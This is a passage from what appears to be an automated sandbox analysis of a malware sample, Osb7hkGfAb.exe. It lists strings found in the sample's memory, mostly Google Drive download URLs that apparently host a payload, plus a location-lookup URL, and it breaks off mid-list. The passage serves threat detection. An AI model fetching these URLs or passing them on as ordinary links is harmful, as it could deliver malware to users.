      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2316016374.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2327402583.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398929460.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2454894175.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4i
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4ib2
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
      Source: Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640163854.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2614036788.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download%
      Source: Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640016739.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398996934.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384110868.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadI
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2316016374.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2327402583.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398929460.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadN
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2130363069.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2104491856.0000000002E1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadR
      Source: Osb7hkGfAb.exe, 00000008.00000003.2104723095.0000000002E1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadU
      Source: Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2454894175.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloada
      Source: Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640163854.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2514090415.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2614036788.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloade
      Source: Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640016739.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398996934.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384110868.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadic
      Source: Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadid
      Source: Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640163854.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2614036788.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadj
      Source: Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640163854.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2514090415.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadt
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2130363069.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadt6
      Source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 